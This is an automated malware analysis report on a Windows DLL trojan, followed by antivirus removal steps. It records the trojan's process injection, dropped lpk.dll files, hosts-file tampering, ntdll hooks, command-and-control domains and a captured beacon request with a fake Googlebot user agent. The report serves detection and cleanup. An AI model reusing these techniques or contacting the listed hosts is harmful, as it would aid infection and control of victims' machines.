Gen.Variant.Kazy.247005_a98333ea11
Trojan.Win32.MicroFake.rz (Kaspersky), Gen:Variant.Kazy.247005 (B) (Emsisoft), Gen:Variant.Kazy.247005 (AdAware)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: a98333ea1155f93d16cb62e7910a0019
SHA1: 916f1bcdffce0e41004bc5adf7d8230002e82348
SHA256: 045f8e8923784a468721bba895546f24070a99fddeb564b7f6b90d57b1c52366
SSDeep: 1536:S0qfWT5MVA90d89X5oWz2vZ9/IezAqiPeMftpw50qfWT5MSJRLY313mqA2b/6:VwWT5ady0k2vLjsRPeOpwGwWT5DJR0FS
Size: 94208 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: CodecPerformer
Created at: 2013-05-10 15:24:48
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:980
hrl1.tmp:416
The Trojan injects its code into the following process(es):
cgyygi.exe:680
File activity
The process regsvr32.exe:980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (81 bytes)
The process cgyygi.exe:680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\RCX2.tmp (26843 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\lpk.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\lpk.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Reader\9.3\ARM\lpk.dll (601 bytes)
%System%\gei33.dll (12 bytes)
The Trojan deletes the following file(s):
%System%\gei33.dll (0 bytes)
The process hrl1.tmp:416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\cgyygi.exe (601 bytes)
Registry activity
The process regsvr32.exe:980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 26 8F FE E6 7D D4 F6 70 43 0C 5E D2 FF 41 D6"
Dropped PE files
| MD5 | File path |
|---|---|
| 7b3f6d64657226480f442a9729f0c6d3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SOFTWARE.LOG |
| 7b3f6d64657226480f442a9729f0c6d3 | c:\WINDOWS\system32\cgyygi.exe |
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to map host names to IP addresses before DNS is consulted.
The modified file is 734 bytes in size. The following entry is added to the hosts file:
| IP | Host name |
|---|---|
| 127.0.0.1 | www.Brenz.pl |
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| 111 | 4096 | 3118 | 3584 | 3.70242 | fc450ddb393352958b3a84d5191518cc |
| .text | 8192 | 1733 | 2048 | 4.00683 | e8e64774a4cad9018a5f26a3e459abce |
| .rdata | 12288 | 2617 | 3072 | 3.08715 | ae0595e3646333f0d1dd17cadd2540e9 |
| .data | 16384 | 1500 | 512 | 0.112976 | 0b2e7741e0c0fc65af1542e370d89f53 |
| .CRT | 20480 | 4 | 512 | 0.042395 | 5fb5b6736ecec6fb84d8f6dc5ecaa569 |
| .rsrc | 24576 | 81984 | 82432 | 4.76265 | 7c6ad741baab77e7fae7c5424863dd61 |
| .reloc | 110592 | 700 | 1024 | 2.91713 | e03a8a70a6a8fbc9c59a60ea5ee41fc0 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://www.0791hj.com/ | |
| jayqq0.3322.org | |
| rat3.100geili.com | |
| rat2.100geili.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET CNC Shadowserver Reported CnC Server IP group 3
ET CNC Shadowserver Reported CnC Server IP group 2
ET CURRENT_EVENTS Googlebot User-Agent Outbound (likely malicious)
Traffic
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; hXXp://VVV.google.com/bot.html)
Host: VVV.0791hj.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 70
Pragma: no-cache
Cache-control: no-store
The Trojan connects to the servers at the following location(s):
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:980
hrl1.tmp:416
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (81 bytes)
C:\RCX2.tmp (26843 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\lpk.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\lpk.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Reader\9.3\ARM\lpk.dll (601 bytes)
%System%\gei33.dll (12 bytes)
%System%\cgyygi.exe (601 bytes)
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.